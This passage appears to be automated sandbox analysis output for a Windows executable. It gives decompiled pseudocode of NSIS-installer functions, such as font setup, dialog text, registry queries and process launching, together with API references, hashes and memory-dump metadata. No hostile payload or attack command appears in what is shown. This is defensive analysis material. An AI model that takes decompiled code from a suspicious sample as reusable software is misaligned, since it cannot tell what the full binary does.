Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}

0x00404b20
0x00404b25
0x00404b2d
0x00404b2e
0x00404b3b
0x00404b43
0x00404b44
0x00404b46
0x00404b48
0x00404b4a
0x00404b4d
0x00404b4d
0x00404b54
0x00404b5a
0x00404b5a
0x00404b61
0x00404b68
0x00404b6b
0x00404b6e
0x00404b6e
0x00404b72
0x00404b82
0x00404b84
0x00404b87
0x00404b30
0x00404b30
0x00404b37
0x00404b37
0x00404b8f
0x00404b9a
0x00404bb0
0x00404bc0
0x00404bdc

APIs

lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
wsprintfA.USER32 ref: 00404BC0
SetDlgItemTextA.USER32 ref: 00404BD3

Strings

%u.%u%s%s, xrefs: 00404BA2

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405be6
0x00405bfd
0x00405c05
0x00405c05
0x00405c0d

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2b4
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsr575.tmp", 7);
			}

0x0040396e
0x0040397d
0x00403980
0x00403982
0x00403982
0x00403989
0x00403991
0x00403994
0x00403996
0x00403996
0x00403996
0x0040399d
0x004039af

APIs

CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
C:\Users\user\AppData\Local\Temp\nsr575.tmp, xrefs: 004039A4

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr575.tmp
API String ID: 2962429428-765901027
Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD

Uniqueness

Uniqueness Score: -1.00%

Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}

0x004052ec
0x004052f6
0x00405312
0x00405334
0x00405337
0x0040533d
0x00405347
0x00405348
0x0040534a
0x00405350
0x00405350
0x0040535a
0x00000000
0x00405368
0x0040531f
0x00405357
0x00405357
0x00000000
0x00405357
0x0040532b
0x0040532d
0x00000000
0x0040532d
0x004052fc
0x00000000
0x00000000
0x00405303
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405317
CallWindowProcA.USER32 ref: 00405368

Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F

Strings

, xrefs: 004052F8

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E

Uniqueness

Uniqueness Score: -1.00%

Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406142
0x00406144
0x0040615c
0x00406161
0x00406166
0x004061a3
0x004061a3
0x00406168
0x0040617a
0x00406185
0x0040618b
0x00406195
0x00000000
0x00000000
0x00406195
0x004061a8

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185

Strings

Call, xrefs: 00406137, 0040616B

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058f5
0x00405915
0x0040591d
0x00405922
0x00000000
0x00405928
0x0040592c

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
CloseHandle.KERNEL32(?), ref: 00405922

Strings

Error launching installer, xrefs: 004058FF

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c2d
0x00405c37
0x00405c39
0x00405c40
0x00405c48
0x00000000
0x00000000
0x00000000
0x00405c48
0x00405c4a
0x00405c4f

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405C32
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405C40

Strings

C:\Users\user\Desktop, xrefs: 00405C2C

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 704810E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E704810E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7048405c = _a8;
				 *0x70484060 = _a16;
				 *0x70484064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70484038, E70481556, _t52);
				_t43 =  *0x7048405c +  *0x7048405c * 4 << 2;
				_t17 = E7048123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E70481266(E704812AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E704812D1( *_t55 - 0x30, E7048123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x70484030;
								 *0x70484030 = _t31;
								E70481508(_t31 + 4,  *0x70484064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x70484030;
							if( *0x70484030 != 0) {
								E70481508( *0x70484064, _t34 + 4, _t43);
								_t37 =  *0x70484030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x70484030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x704810e7
0x704810ef
0x70481103
0x7048110b
0x70481116
0x70481119
0x70481121
0x70481124
0x70481126
0x704811c4
0x704811d0
0x7048112c
0x7048112d
0x7048112d
0x70481130
0x70481131
0x70481134
0x70481203
0x70481206
0x7048119e
0x704811a4
0x704811ac
0x704811b1
0x704811b4
0x00000000
0x704811b4
0x70481209
0x7048120a
0x70481186
0x7048118c
0x70481194
0x00000000
0x70481194
0x70481152
0x70481153
0x7048115b
0x70481168
0x70481170
0x70481179
0x7048117e
0x7048117e
0x00000000
0x70481153
0x7048113a
0x704811d1
0x704811d1
0x704811d8
0x704811e5
0x704811ea
0x704811ef
0x704811f5
0x704811fb
0x704811fb
0x00000000
0x704811d8
0x70481140
0x70481143
